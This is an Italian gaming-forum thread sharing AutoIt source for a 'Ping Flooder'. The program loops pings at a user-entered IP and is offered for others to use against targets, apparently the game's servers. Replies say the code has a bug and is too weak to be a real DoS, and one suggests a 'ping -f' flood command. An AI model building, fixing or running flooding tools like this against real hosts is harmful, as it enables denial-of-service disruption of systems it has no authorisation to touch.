BorderGame

Versione completa: Ping Flooder
Al momento stai visualizzando i contenuti in una versione ridotta. Visualizza la versione completa e formattata.
Ecco il source usatelo e lamerate Tongue

Citazione:#cs
// Programma by Luca
// 24/02/2012
#ce

Msgbox(64,"IP","Questo è il tuo IP: " &@IPADDRESS1)

#include <ButtonConstants.au3>
#include <EditConstants.au3>
#include <GUIConstantsEx.au3>
#include <StaticConstants.au3>
#include <WindowsConstants.au3>
#Region ### START Koda GUI section ### Form=
$Form1 = GUICreate("PING FLOODER", 257, 77, 479, 270)
$Input1 = GUICtrlCreateInput("", 8, 40, 137, 21)
$Label1 = GUICtrlCreateLabel("Inserisci IP da Flooddare", 8, 8, 120, 17)
$MyButton1 = GUICtrlCreateButton("Avvia", 152, 8, 92, 22, BitOR($BS_NOTIFY,$BS_FLAT))
$MyButton2 = GUICtrlCreateButton("Chiudi", 152, 40, 92, 22, BitOR($BS_NOTIFY,$BS_FLAT))
GUISetState(@SW_SHOW)
#EndRegion ### END Koda GUI section ###

While 1
$nMsg = GUIGetMsg()
Switch $nMsg
Case $GUI_EVENT_CLOSE
Exit
Case $MyButton2
Exit
Case $MyButton1
while 1
Ping($input1,65000)
sleep(150)
Ping($input1,65000)
sleep(150)
Wend
EndSwitch
WEnd
La gente proverà ad "attaccare" i server della GF :lool: non sapendo nemmeno cosa sia il ping
Prima non l'ho detto ma, c'è un piccolo errore Tongue
Comunque non fa così danno da far saltare i server della GF
Non si può nemmeno definire un attacco dos
ping -f 127.0.0.1
non funziona piu'? Big Grin
URL di riferimento